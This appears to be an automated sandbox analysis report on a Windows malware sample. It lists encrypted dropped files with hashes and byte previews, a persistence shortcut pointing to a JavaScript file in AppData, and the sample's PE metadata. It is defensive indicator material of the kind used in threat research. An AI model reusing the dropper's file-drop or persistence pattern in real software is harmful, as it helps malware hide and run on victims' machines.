                                                    Preview:.o...A....tucp..HQ{.\..,0Y.pQ...L*....d....?..9(.&6.ph....a?.!.U....-l.!......{..dI.].....K........k#.MI.U....9.o.....s.......d.....c.......4W....b........<[..d.^...C..t.P.S|&bO.jQ.N;X[...I.he6..f...l8...#....O...vK.}2K.AV.K...A...w.(.....<P...s.b....h.@..[Y..`F..e.S..;../.h..e.F.r/...D6.`._.8Q..Z.......[..f..P....&.t@....^.....3.z8R.D.....O...{C.o4.Qj.w.J.ua..1...C.c.W.o...c.../.d..5.W...u..q...r...1.K....Y.d.._.......!...~\_1\..09....i.N...z...(.)......d....D...,....e.&y.`.......S.X..0.v..X../T.n..Uy.M..&..x....n.D)G..(....D.@.....2>...}.l......#eE.=...$.+".u?r....k..n.x..7g,.3....i....j.0_...D.lh'.C..&K....?..|..y..'........k.YQ..O..a........D.]&.uP..Z..h.N......R..`.....jo..m.]/..+._:<.....!...........\WR. ..%7Ymp~+.B%.p......f.^...i....9....n{.W. .I..YT.3.b..m.D.h".yW.d.'.f.....~Q#..F....Dii.qm..IB...I.+.%......].I6u&.u&%.l..?.f.(....>Q....&$..|j.H.Y)dO.l&..r_..C."Z.&.'.r...h.CZ.IU....r.......>...>.....%..*......t.`.b.....P.PB"
                                                    Process:C:\Users\user\Desktop\ldqj18tn.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):69632
                                                    Entropy (8bit):7.997194265654002
                                                    Encrypted:true
                                                    SSDEEP:1536:v+pxZi1WY75TwdFzkQIfiLiR5fARQvjc9fdWx3L4wRrvTkTppGc:v0S5Jk+QIKirYaQpUx39c
                                                    MD5:EFF591562D9AEA14D2872367F7B7103E
                                                    SHA1:464E462445DC343E316FFCB6B29234C446D0A064
                                                    SHA-256:5482A9A3B48354EB14C55DDB9E2595E79B03615C93464FD0F5FDD6E208AF4F82
                                                    SHA-512:C75FA0300B30B71DE261982BE233E41A96E00E0B83FA4A9AD163FD3E740B1A2EFAC99435A1887459F6234F6BDE7ED5D9D53C1B26AE4F0414561A03E38AFCDCDD
                                                    Malicious:true
                                                    Preview:[..>K..F.`.>86.!.3...........^.....|./.J.CHE2.{..C_...F9l..`XW6.H.....;\...:.b..'..c.Y....>..\.\...vX..6; .(.....0...0.....V.S.J.v.J..}3.....>.}f.7............=,.+Z...Fs}.g%..w.......$..`.S.....z.].Q.s.=... .e@).&...F....%Ayc!.PJ....=.k.x.....v...Y~[....G.....*........T.n...|.u.....M..iA6E(..E.I..yNk.l...,{....(.!R..........H....'.s.Rg<m5w`.Y....q..#,......T.O.94...c.V..... 4m9..m...m[...:.q...'.0......m..........x.....3.U....{....Uvxq..>U...k^fr.$q..a.cr^w.T...A.F.ma&......hu.9.{.a...)....o..,....M.....T..=....j.v...iH.o.09"1...[......-.2..mg..m...F./U..F.T.&..z...r.....U.}.w6..$0fN....!...d..@...u.....c.NY.-.."..m.^.BA.:..Z..,.0..E....e.........S).-....P...Og@]kdRVF..9..p..*.S....~p......=R..vyAN.....n.....X.2...7.F.....M.v.,..t.XH<Yr........Q.=n9Z.P...8f.#:...k ;].wuT....]5..8......-..R.>.u..g..:7B..#2.a....u..@..(.......\...I^.1i\.q.`....QW.e..ga..A..5..,.....e^4!i......I.{3~.S..|.......1Z....9.@r...Y<_.....5.;..9...&.....
                                                    Process:C:\Users\user\Desktop\ldqj18tn.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):59392
                                                    Entropy (8bit):7.996765889888764
                                                    Encrypted:true
                                                    SSDEEP:1536:awFUJIg3MqmVC8RUIvzJb+OriV7i8svKR5L8LXaIBMm83qclL:bUKg3pmVC8Rl+Zt1qIeeoG3qc5
                                                    MD5:0B20ABB260FC790E78F84A960314499D
                                                    SHA1:631654EB5A843F48D7D4F75A95305CF738A92500
                                                    SHA-256:7491C99CCA33B24B2F8BD2EA72561D60154E51142796C28A46D32C2DB5E972B1
                                                    SHA-512:6CA15FD999A40CF37AF80A2BA79A5ADC45F997D978B8051CF3D0C858AB26C2DED9D6CFAEDECAE1DDAAF1AFCEE2B9B72FF6E38064B8AECEF3BD4AC4314BDAA43D
                                                    Malicious:true
                                                    Preview:..Zp..uz..>.-.N..5.../.$l.S.`J..(..-D..0.~......$p.RT..5Y#.M.[.F.i*...S.nf...4.X..{.M....%.....JD...nN.C.k.?.A&.c*.....x...r.Z.S....pu.2.AKR.m\..\;...1.w..+....z..$..b..Q)..gyfhW..8......./W.......zBj.{k.9...;.....k?)...an.q....C.ms...@..^..L.W......b.d.\.......x........U.\h..T.l...o.&..u"...[3?.P*3@.H..'..'X..!.DL...t%.8X[ ..r4..DM{2j.U..1.O.......5...Z.Z.$../..u..`.C.S... .n.....a...K..\e2................nyv....'A...14..O.I./L......c...f}....t.r..~G)...^E..^F...l..;3.>..&RV...@..e...>.....Z.E...5..6.>R<.....!...3....a..qWs59.*....K... ....<.Z.d.d`$..w..0.C..<..^&..X.:.S.....Y...\..../\..../.ZDC....9..=@.>O.#.......,l.n.....V...J....R............+P`8m.D....TU.=.....<v.z],.%.../b..>R..kf..2.z..D]SH+6X....a.t.....T.....7U..l.$.%..M.t....?6..{.i~.E..*_P..o...A.WS.g.....o.........U:q...+2...+?..;.9]H.{y.......P.{QL.......Fl...^M...?g......]....7.th}j..Z..l.......6.\...C.b..<..:..B..G.....VC..%..P...O..........dr..Ad.#.$.....Cm
                                                    Process:C:\Users\user\Desktop\ldqj18tn.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):54272
                                                    Entropy (8bit):7.996455408231238
                                                    Encrypted:true
                                                    SSDEEP:768:872ws5O3wKoSCM0ZV4EdtkFb5iezgE6kZn3RKcZweWZvNB+0EQuHmEchpW77Q2xB:C2xuDVC7s4eIsnB5ZwbNNsOEq245q1b
                                                    MD5:24548BC705858B908DF8590C42555E34
                                                    SHA1:DC16D01B52B94E0BFA33BF8124F8E55ABE1720A6
                                                    SHA-256:B15854B830337EF3DB8458995B59B02037839D4C7D2EEB69124344E29AE77671
                                                    SHA-512:F3C5D612BE5784B73255F5A0380E38FE116BC39D3B261582CB748C91CA098AD02D25DDDEAA57216F0B7E30589F3FA296E2945D8C4A3C04CC347AB0187EF08834
                                                    Malicious:true
                                                    Preview:...k\}.i.[o&....`q.!a...{.....,!...Y;.r..D.....!!..=.G=..C.6.S"s...V1..b..J..=9.;C..M.D...qA>A/Sr|...!.....g..s..#........YU.1...t......".T.......2/.......GA....'B3.k.....U>.KQcd.`.]LtN./....m....e3..Jf.]....g...(7b.....~.{.........".....W.M.4..W7...~..Q....h..=@.q....p...2v"...9.u..K...wB....."~...s..G.1.`...7#{a..... U[Y:!.......4N61.}...:.\.[..jgm..f.|&...%....#.y.c..LV....../O......N#.....u2..$}.P..{].....,./....y.2......).R..@X...e....3......o.<.k.K.X....".h.R....Kd..iq.~C9.'.XS3.D{.hp...."...]]D.... |7e.2..(.u;.W.&...~-.:w...a...?.>.......D...UX......C........I.-...s.....f.IJ".x..6K6..!....s..hK....m+@....y...U".b........km.1...U....`..>!x....4...;.O..Ov|....>Qc.br..yq7....J.j>...m...i...Ou..y....W....u...s!V5.i.o.dw...1..g|..G%.q3....\..M............5.Y;*].c..N[....4EF...9.S.)...\.N.{n..A.]O..$jZ.*~aG..R.s`,.@...J4.B....=.@i.;..4..)m.*..d."g#......I...?...G.D.M.V.2..(n@J..:.T=....vk.q+...s.wbX...J..S..1.J.&...,{..K].l.x...
                                                    Process:C:\Users\user\Desktop\ldqj18tn.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):101376
                                                    Entropy (8bit):7.997914373248418
                                                    Encrypted:true
                                                    SSDEEP:1536:1H16MKOSG3fStcKwt97Fr6dj4go6KzouYbHYqEVSBjAFYI26wf9kp9ZB2lyDNumy:PxaG3atO77FedscQcYLfYN6wM7PO8E
                                                    MD5:25AA98D5EF3952A5A0BFF32301C09AD8
                                                    SHA1:569DD803FC9CFFA01C159C650648A3F627635000
                                                    SHA-256:3377FF0A28AC9AD8BA3C164CE29503AB3E4BE2632978BC519859B59B3C9E6A16
                                                    SHA-512:5C260F85F498D04E8F9CBFDF63521A86D69E8E60F2E5971CA3F95559B444B791F3F47C403D84193FF84C962214FF57ED9D6710AAA4059F78406AB220BC23371E
                                                    Malicious:true
                                                    Preview:1..{.XH..{6-.qr8...Y.BD...C.5.Tw...r....r}......s.Y...Y0h...{...M..86..48/...y.|.`0.T.R.f.u-..u..d/. ....t.W.xM.?..I.p.=...i...|.6...[y...\..=..lu.Q...wl.a....".....f..e....D.P.&|D..9._!.#T...........QNq...k.Y..g..z.G.5..[j_.U.D./..`...8p...LZAvl(A{.P..KE<jJ.F...s9"p..6.m..U......"..f..&..a\...?.\.2...}......6.0....R%I.4...0..c3..v.$.x.....).LG..v.....B?.x1....t9O.4}.?.d...+.1..1..B/0b.hFqv..,Y..K3S...<...............^.q..2.N.b(..s.%..w..W..5..Nl..'<.P......#.....T.......2.....G...d..G':....c..QG..x..9.V..........V....S[..m.XX.ONm..pu+^.<.Y...:Z....*....."{.I......B.p...Syl.....L<J..2.v]N.El.Q....n.>..B.../.a..y."M...........?I..<.U...(..."....".%..z;.....q.v...M3 ..s.;.$x...)HfW"pw.`@.UL....h.."b.z.....p.{Qs.......SA.>kw..h.e>\..G.._.....2.I".1l2..x.|.V.n..T......E.(..+"M...4.d?..>..t..)..{...U.+.._4)......+...~Ak.T..Wh;u..>?e{........|.....]...m|.(U.ZD...e..J..p.Q7Q*...E.".;..: yin(.ZF.K).$R.......pD!`..^.F'|....Q...MX0..8@...5...c..
                                                    Process:C:\Users\user\Desktop\ldqj18tn.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):61440
                                                    Entropy (8bit):7.997269818226767
                                                    Encrypted:true
                                                    SSDEEP:1536:MXrI/MNgZ4Og0Rjihiu9qxwil6DIFcNZe:MXrI/fKYo6eZe
                                                    MD5:1C80BC738D8205B5D4C2B2445CBB31F0
                                                    SHA1:253BEC88BE97A71788D6152908CDBA73E55B46A3
                                                    SHA-256:492E8EE10FE8D95577C96FF4CE184DF20560207DF7D1631948328B960434FA61
                                                    SHA-512:1F299A0C55197C780D65D00909447EBCD5703EF9426AA6844C2897D572B3AAF555C2ED20C5BBDA965C8B25232F5A79DCF749417DF7915A60E6621DD1E16BF6EE
                                                    Malicious:true
                                                    Preview:..:d^n.q..M#l...L..~..{..I.h..7......z<.dd>....p.....n..)7..3......;.N.&......C.........Z*].Q.k..$.......l.\..s...w..T8..|..h..Xf....8[...O....gpr36b......&..=....LE..X...e.9G..d|i+..5.......M..R.........0....m.u..h.................mT......-f(4...b..k..k.RnaX...[!qA.(7.......7c..=...~2..K.c;......^Z.?..zT..(.$..F.at....^...0.~]`@M.......X......y4....\..j.)..b.ft.40G%y...5E.a.1..$.r.D..z...P.)....^..Qy....WE.l....G.44.8.pc..N..H$..Q..V,S../m+../.L.{....s.v!O..5xKG.K....!.r..;.....S.U.R.'3f...%!.6rB.R$S..J.N.........A....v.o.S.(.B../..y..gq.D.....4..D{...^.\...N&J.._.Or.....S..p%aX.F.*t.C/...Q.@...b.(..%S.....R<8uj..Y.q..@e].B..u..z...nf.7.~yt!O(...$..".qpMu.~...5@..k..-.E>.5..7u........R..e..>.`......N.B..7.3.@vh.[c..<......q..v..s......8.....~.5..=.{..~.W6....~.(....5.t.F.....3...?.]..9.h........N#u......wBa:,.6q.n>N..".Ix..>"..@z....?.......%3..X7....y....'d.A..~...F.W.....@..........J.V.......dz.....5.S...{..W.....+......8.l..O.
                                                    Process:C:\Users\user\Desktop\ldqj18tn.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):5636
                                                    Entropy (8bit):6.0876490146743425
                                                    Encrypted:false
                                                    SSDEEP:96:kfkxgUzr4tgOwVAfBzDICS09CAi6R7u+IhsObfS+NsPvj6ooxdofjxP3yGj1H034:smHAeOqAFDw09CV/2nPvj6DdMP3r1HI4
                                                    MD5:598774EC6001A83BC8A24565E2A908BB
                                                    SHA1:503438709CF002913D96E2A7EF51325B0605A64E
                                                    SHA-256:79749AF598CD4506AD7AEFE35BA2CB8AC24CE4961E225E5DF345A95304AF1678
                                                    SHA-512:0BDE914E7AFA80DFCEBA929C53C239FEAF0C21200C245D606CFFBF8E9AF1525F57B21E96F003DC4C4EC29120C641598CEA6EFB51530D542C83B989202E31A670
                                                    Malicious:false
                                                    Preview:MARTNMSPIDERRINGTONE..MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........sD.R.*.R.*.R.*..C..P.*....S.*._@..a.*._@....*._@..g.*.[j..[.*.[j..w.*.R.+.r.*......*....S.*._@..S.*.R...P.*....S.*.RichR.*.........................PE..L...._pZ.........."...............................@.......................................@...@.......@.........................|.......P....................p...q...;.............................. [..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...P............<..............@..@.reloc...q...p...r..................@..B..........................................................................................................................................................................................................................................................
                                                    Process:C:\Users\user\Desktop\ldqj18tn.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):87040
                                                    Entropy (8bit):7.9979586106795955
                                                    Encrypted:true
                                                    SSDEEP:1536:1w4kfylR3M4LxsCKKb5y+IWYzr0V0Ni6NNq6wOydrqcSusn+WLjkZeYctHeYIlhk:1/kaozzKNy+6PBhzwOGrBsn+WLjkZeu4
                                                    MD5:7B0DEE84D05813B43B680C8FEAED52DF
                                                    SHA1:6831401C9BDB63B42E6AE66B5B3A619A81BC07F4
                                                    SHA-256:CC15CDF080BFC8C16B669782B545C9FF15633ADA54809FCF6BE8311E1EF684EE
                                                    SHA-512:921D7B873A99C0665F32AAC000CEBBE3BF6A0D9CB8D82E6305083EFE57023971613EBB32956476DAE3ED7DCD71C7796F75D12A1840B1928845E47AA3645211C9
                                                    Malicious:true
                                                    Preview:6...G.....MO..&2..C".j..)u...7...p..E.(..NO..B..VljU..w7.#t.B)H....;.l...g..J.n.siJG(et..01V...A.A../!...b@WUd....2..T.."@..E.U..........P.0......d...Z....TJ....i....qa~...^'...9...M.-Z..>>3.l..3w>..70...........>.F`.....g5p;Ex.6.9.Q..6.....S....;..>..~.7..O...o..a.f..E&.GdD.....-R5H7...G........6...J....6H_-.4..uo.LQ..<.`T{..]r..~.u?!O~.....C......wt..g0u,Q...E4..d..?mq~...z.C>>\.....c..L._@j........9v.P.9..qh"..A..4&;.2.j...n.%...eK.|.$.z...+s....H.a..u.....u..m.YM...o..3...P.,M.........]...58.2....@...E,...[...Q.+..HU..'.<....i35-.wI....6^...=.s......0.0..-...5:.]mx.c..R....0.Y.e(8T...0B.....l-..)G.....K.@...e"..fc^D.}...YCo...`.Q...u....C..I._.^B...h....3.n...E.h....r.......x...-.cmY..a}..Y./..({..,g>..I.......>..U.B@.<$..<..V..}8..g.....a../O.[M.8.....e..r4.=.O.[..Ln6.M.{..c..?...^._....q....GGI.v..Z.........?..c.r...b}..*..V.b...i.=jF...M..".)..&......u!T|...^..]f. ...\....1Q.3.Q.....R.........PLb...t..C..r...M.y...]9...(.d.
                                                    Process:C:\Users\user\Desktop\ldqj18tn.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):59392
                                                    Entropy (8bit):7.99700719991649
                                                    Encrypted:true
                                                    SSDEEP:1536:kSgReDsZ2S57pfLb2Uf5c5saqKuvaRt4pn/GoUVjSoKgLWmHjJlym:kSZopbSpqKuk2puHgoKgLBHjJgm
                                                    MD5:C9E306D19DEF703774D08975E553263B
                                                    SHA1:8AB1DE74C5C1A45ABB93D0996C6D58F1530D4A4D
                                                    SHA-256:E2CC14D5C33F5A9799D81683F017914C0C568FF4F634D5CDAA69DC086C01F88E
                                                    SHA-512:8CEA19182FCEEDF07C81A7E5C9ED35E17591484C7BA4728EC65737E7E2ECFAFD288E656E036BF74E52E20EDED358223E058F5DEB8D9FF435EFB1B00FD94B51BA
                                                    Malicious:true
                                                    Preview:...._....Y.n..k<.|.....JPU.?.<a..2.I...^...z.Bs7.H..)...).W...!.~................4jF.......z...|...c8[.v..3.)g. .........i..sy.......%6.5........8.a.|."...*w...p....v.(...@.F.|..8.....Q.....tD%...".BL.;...@.........9.].ud.ya.....@....{......O...w.fB.zO.-....A..O.p+..-.....#?.....M.7L.9..zx.Q=.n..K.a....[...=...{.u....2.?R&(N..........(.1hZ..R...4Q +.K..y-..S..'_'d...1...........oHw.........6..a..."......x....g..l...V52.~..1..u..>r..^^.k....:.q....(..L.jI/..E.....<QD*8J..1V6.9.r.F..Z@.....-.C.s.xD...7.*:...Fzk.n......^i..D.....D.F.|J.....pP...G.CG.U.QL._..v.Yj.*.&."J.&.o.jK.....=!.yRo.3..;.G..U.p._...V..t...@.[.m.'.a.I$....1..8%.;=...z.3.....0.:PtE........l.fA;....^WL%.$.AK....Y..5<S...)! .,D.1.f..?K ..O..Re..P..:...Q.....)s0....Y...d?.>....}K2.......Fnl.x.|...Y9.t.{.....3.......d.H.~...9Z}.0..Gz4..v....+s..C:.<..*.W.....L....A.....I.!+.K).&.%....)...>.hN....x.r....U.. ....4.gO?......h[..U.....F..."t.G.b.....(Cv...>j:..K.]...C.
                                                    Process:C:\Users\user\Desktop\ldqj18tn.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):53248
                                                    Entropy (8bit):7.996397386083232
                                                    Encrypted:true
                                                    SSDEEP:1536:VDObOdYwNIGtwKnEscdKdnZ715rJVe6LODXFxLU:VDNdE4w6KC35DeXXFxQ
                                                    MD5:26BFCB75C4F0FF69CEDE2EAEF6CBEC06
                                                    SHA1:41D437AAAC0ACAA0D98C4FDA6586A61979B25F13
                                                    SHA-256:7BE8B9F51B43F525D0140EDC5502BE3A6E7BCBD876DDDE442FABAD43B6D19B36
                                                    SHA-512:126740665893FC6F775A8BF31CA7CC243CFE26A84A61752BADAA684DD156E08D6F473AF7F0C9796A8062C8A67AD873B0AA9DFC44679C84C4CC83ECFB63317381
                                                    Malicious:true
                                                    Preview:{./1.Z6....L_XQBe6w..H.....a..L0..sMoTt.sa.X=..e.R...........v9....B/...tX.q..A..c.39.....J.T.?^w.Z.Eg.H71..M.oN.....-8E.....W .....b.u...).D..-e.4....{.0..Afd..y.w.9...0... ......Z .1...zw..J9.z..r..ZrB......n.V.;.8..}.N....y.PU....*AV...'..Q...g.......v..=v8.Q....u\u..J.KH....1...*-....'.v.{.[.6..luS..kxvjx.-K.o.4:N...Q...R.2.Xi8.A..q..W...T..Y#....1......n.:)..~...x.fX...Q..v.X......Gq..$..1}.).e.N.W.v...A..Z$.2...$.L...)2.......Mj.Mt..z\h<....Or;..b...X6;...+?.M.Xa.5... .R....1l.|.A.<.;....N..i.......k.W............=..e...5......>*.c.o....:.6.FU..%...`M.f6.$...9.J...3.........D.....=HK.~.sec.D..0T..$..?....d+..4..h..u.Z...X..h+^.*......[.*C^p?[......v..a..KW4.....@"..T.ki..."...a|....z.7..c...q...\t-C..eV..[..<....V.x.C.n.|.X..b1.z.CL...ns"e.!...../.6.-).....^..KX.O....Sa~r..v..U{.$.....p.?z.M..:....<..`...e.l.UG.`L..A.3.?.Y.....n.?.t...!NUw|.F.G..x...I..B.}...l...H....q..)..?l.Y.h$.w0\XvZ.....y.[....!e..}....b/i..H....n...;....'.Gy6i1.:H>.*..-
                                                    Process:C:\Users\user\Desktop\ldqj18tn.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):97280
                                                    Entropy (8bit):7.998052732299105
                                                    Encrypted:true
                                                    SSDEEP:1536:Ni5X/n8JL88Im4dSgQ3QDLTTWWzDO2Phn3TYXY/EuESYwOOJltjb2It6rc8/NyS:NMXf898Fm4d6ADnTBzD1P2I/ECxLJlxi
                                                    MD5:2B1531C3961A12A05168DDBEC6DE9351
                                                    SHA1:BF02E49064C0B97400F5E54A588D02B584D0E700
                                                    SHA-256:6A1F12DCAB292378358F48014D0078407B2A141237BD7B318A83539497346FB5
                                                    SHA-512:5DB2C782FC950BBD409A551BBA32708A5A22B78779D92DAAF9C56B73B94CA8478493B15784FDE711292E87399A06C51D5898179E4B5302A0531492F330F73C57
                                                    Malicious:true
                                                    Preview:K8HH...T..P..+..z...t.wB..gqa.XiaN./.,.*8%.u...(.l.L..I...z.$.d......i.:.a~.V..!.[w....0.).._..x.g.b...f`{4!p" ..&`.P.C!..1...o..m..;...[-.<.?>o.p.m.....z.{yAR.....L.^aQO.N..._9...(.......;St.:.....8...%D.Qq..Of/p............7..v..J.h.m......................^.2......Z.#.H..<...G..l..Ab).4..e.|.......u...}.>.X..i...M&C..{-.....w.j+.,...hR..mGT....Ou.....,j.!B...@k..A7.y..T.....'d.`.=.B.(.}U%..H..^.......e6.4.....qz..25....u.....=....|.nOe......b#..]....^.Q.@...........&\~%..D.e.Cy;.'.T...w&H...f...*hl.OJ.....j...+.a.!.Y.[..q.E.....%j%u@.c..,L........}...b4...z".OG..^a...=...v...e.......^...? 7.DuZ..-.A..&..3.%.H...Z....P....A3-.?.[.}...7.a?..>.g[......e. .&*....c..e...N.0.\.z.m....,......_#.7..P..:9C.......N0....;.W...c.5.9.....r.....8..@...K.....9mK.}]".i..iNb?^L4.T.+...i........d..N..n]..0......./..GQ.....Uc....Q}.....4.VDq.Y...5......9.BRb.+.fgT...O........<gS.ImRe?@.x.....I..ZV..(.8..`..{<.2....*..\...,..)w...9/.q.>..~...n*..
                                                    Process:C:\Users\user\Desktop\ldqj18tn.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):66560
                                                    Entropy (8bit):7.9971208270762375
                                                    Encrypted:true
                                                    SSDEEP:1536:otshYdm8KllFFnGuyxeOFGpQMpItjKYvvOfPWE:qmNllvgLGpQhDvPE
                                                    MD5:91880DAFDBDDDD3A7BECE82040731293
                                                    SHA1:B2D53F9DCB1D79F5CAE8B20604CD22DAA223287D
                                                    SHA-256:30B0CD78DBFB69528322CBD789347159AE4756A7667B889FDEF022ACC468A658
                                                    SHA-512:FDE9B03522B27033E88371270D4491DF43A5B347F20221E7932548E9565BCDC08A8B7294C62F5CCDE1AAB0236061E13D675B3D1A213CD79384FC1E50ABE46B82
                                                    Malicious:true
                                                    Preview:..[.m....!.U.%....[.-...m.=D...6...(E...&\.....'.x.G~Wp.[.2v....Qo.73..........?F..`.@_...4.!..t.4+..ch..H;...~dd..7.|......@[.."........E....\>...l.#..PEG..L.$.,..[A..k.,.?1A(.aK.&...p...'Q.^....m.}..E..v.)s.f......).h.....}<x........c...q..1\+...k...j..Q.<a.f.3..]US...J.=&.|......1?.. E.ne/..#........}.U_v........%.#...'...D.,...S...u...]...2.-.....l./...%OG.....O.jq...d+.L.(G......4.|...+".XF.G..t...}J.s,....&....zF.y......R....i....3U...|.y..+.}.. .......7.Z.W....6......t..P.m..+..]D^...|.a^...#..`.*...s......z...V8$Z{*.\].GX`.......e..v.@..E^.."k.s..S....gd.16&`........-K...W!....S.X.....5..c...Q..6. ..q$...1;........\u.sws..........i.dva9.L..D#........T.1.K.......E....L...HX......x..........(....nm....*P..#.p.o.q...&..2...a?.IO{]..G.)gQ(...U...:v..Y.a...0.....0..B..F.:.e.j.?v..Ha..<Q...@.i.m..@P\'W...........`.:..R.jMb.-.F..qn...i.".C].z9.....R.O.....W1.=......L.7.....qiR....~........9..I.....S...f6......R....e....".
                                                    Process:C:\Users\user\Desktop\ldqj18tn.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):65536
                                                    Entropy (8bit):7.997070878978732
                                                    Encrypted:true
                                                    SSDEEP:1536:8cYTYhic0cJIiMbRTPZBQD3z7nYIDoncF8OZ3ChB:8cYTY8x/OgIsciOuB
                                                    MD5:597F565834790C594B894C61459C3DFB
                                                    SHA1:D47C91AFE8F194C45055622801148DE7D83A3907
                                                    SHA-256:91A36419B02C0BEE19EE66AE6DF90302AC6B64BD15D1DB74BC6682DCC03CBD17
                                                    SHA-512:2AFDB76CCAAD9995317F53886B638800743D88B8007D89E47B45706757BBA421A8C1624592E64FFB73520B5BF26D5AC4A68CD2FFE7A4F5E8ED27F943A2DD5AF6
                                                    Malicious:true
                                                    Preview:,.9...S....~vZ......e.l.c.*.s.2O....$.-.5.`..StW...O.r%Ys.....7~q`=n..,....1....6.Jo"(......X6 ..M..Qb...B>.&.v...d..........y....C...3...;....I..'C.......n..N.4.2oc{l;.!....c.Hr.B.....nJ..\.7.2~....BV.TS3R..C..;...i.4..LQh..+I....Tm..].....(..9&!<.rA.w...(....1.w.qV.[;...hO...z.F(.`..s{.&?....[.5;....d..<.............._.V...,.r....i..u...^&NT..45.;t..C.+..S...;...-..|..S..!..s.N.Q+-C.5.....}L2<.._.m..|nB.....Zb..R.1b$...`..E.6...1..A.g...c.\/S........&E.A .*!....8..a+....T..5yM.z..CP.+..b....i.{q.....9.R.L.!..r..n....T (zI.R..w...f.......k.).7..l.W.~....<..5..N...S....J.....?....93eX.@ ..8..y~.......dGb.q.{.S..J..!@.n.cn......J..U...C....N.M.l...>.|...&.......1.f..)Y.b.._+.....'....v........G.k2.4[...........Q..2Ch....\.Y..Q../.H.O..ts.h...~..=...>~.~.\:....GE'0Y.kn......LU....o..ZJ..).J;..[pmR\..d.c,.3.=.o....g..Y!W-..^z.L.{7.E^9u.{.P.8.j.......T.>.-...m..2..*...N.. ....z...y.]........c....>..%..............3...A.....V+..........=lc.(
                                                    Process:C:\Users\user\Desktop\ldqj18tn.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):887994
                                                    Entropy (8bit):6.622324410902026
                                                    Encrypted:false
                                                    SSDEEP:12288:SV0etV7qtINsegA/rMyyzlcqakvAfcN9b2MyZa31tqoPTdFbgawV2501:wxz1JMyyzlohMf1tN70aw8501
                                                    MD5:480B699995A5B0B846D54973B83DB3E7
                                                    SHA1:92241BB78A7A8769719D0045621C853F628F9495
                                                    SHA-256:8615162D4D1718863A131FF5E242884922AA463FE2D6B48BD8CEADD9F519CF5F
                                                    SHA-512:83495FC821564E92C90CBDFF7C7F52D6AE6A9367C9845312231E84D0246110E095358EAD78427F4A6AD9A7276D4CEE538C7C753876FA087C8918B24C1CC1A176
                                                    Malicious:false
                                                    Preview:.}....E.P.3....I..E.M.+..U.E.E.+.E.E.P.6.U..M...p.I..}....E..u.M..}.f..........E...}.f.......E...E...}.f.......E...E...}.f......f..............t(.E.f.........u..........E..+...;............t'.E.f........`u..........E..+...;........U......................... ..R.....@..U..._^[..]....}.f.FX.......f......f.F\f......t_f.F`f......f.Fdf.......E.P.7..4.I....9^Xt=9^\tE.E.P.7....I.9^`......9^d...............{.......}..t..f.E.f.......f.E.f.......U..wL..M..........E....t..AX.E....t..A\.E...~..A`.E...~..Ad]...U..Q..xL.V.u.Wj.....8W................4xL.j.Z.U.;........$xL.....0.........F.;G.............................................}...VW.....~d.......~h.......~D........~P.......>.t..6..<.I..&..u...wL..x.....4xL..U.B.U.;...V....u... .........$..........xL........t.Q........xL..... ....wL.J...wL.;5.xL.u....xL.....xL.........._^..u..5.wL.R....I..%.wL.....xL...t...xL..D...8.u...xL.........]...U.....M...xL.SVW.....wL..u....]......j....E....(.I..{L...t..{L.....}....$xL.......KH
                                                    Process:C:\Windows\SysWOW64\cmd.exe
                                                    File Type:MS Windows 95 Internet shortcut text (URL=<"C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.js" >), ASCII text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):89
                                                    Entropy (8bit):4.909910437300207
                                                    Encrypted:false
                                                    SSDEEP:3:HRAbABGQaFyw3pYoMERE2J5xAGNohFMhWlc:HRYF5yjoFi23RNUFMr
                                                    MD5:F795B669B93704F72038CC30D21E74BE
                                                    SHA1:E6A488CD4A9E94DB5E68754EAAE4F47B6957BC73
                                                    SHA-256:F728B132B86B76EFB10B8FFC38D630A1B331C2D83C61B30F12E614119E2B1051
                                                    SHA-512:55422C48D41C24BA3F914B13F03F9975037D18E6FC689814E3FB5D6B60C1EBD0A581D012903238458950EF13ECA568C6E0D8D892830D42419F4B880F01757B1A
                                                    Malicious:true
                                                    Preview:[InternetShortcut] ..URL="C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.js" ..
                                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                    Entropy (8bit):7.988870164236672
                                                    TrID:
                                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                    • DOS Executable Generic (2002/1) 0.02%
                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                    File name:ldqj18tn.exe
                                                    File size:1'656'911 bytes
                                                    MD5:574ab8397d011243cb52bef069bad2dc
                                                    SHA1:1e1cf543bb08113fec19f9d5b9c1df25ed9232f6
                                                    SHA256:b376d8b2108027a42534314eb5d82a70b06984c7dca8e91df66d00f5c6e91f20
                                                    SHA512:c3e3f7809e5540bdd59a0cd62e0c718aa024355952f7062aac9eb4b7f40009ac97072962f9799a2dd4e2194e7a8d4df8dd4636306ecb7fee6481f6befb684702
                                                    SSDEEP:49152:iEVxqQJAyCoZxV/yPHZIQDjLO7MFVrbMwjK:iSxVJA7ofVGHiMjCMFJAwW
                                                    TLSH:5375338CF9972D12D68E2BBB613291505BF87D7704B6D4EBD705D81EB23629028CDB23
                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8........PE..L.....GO.................n.......B...8.....
                                                    Icon Hash:c1c0e4ccdcc4c4dc
                                                    Entrypoint:0x403883
                                                    Entrypoint Section:.text
                                                    Digitally signed:true
                                                    Imagebase:0x400000
                                                    Subsystem:windows gui
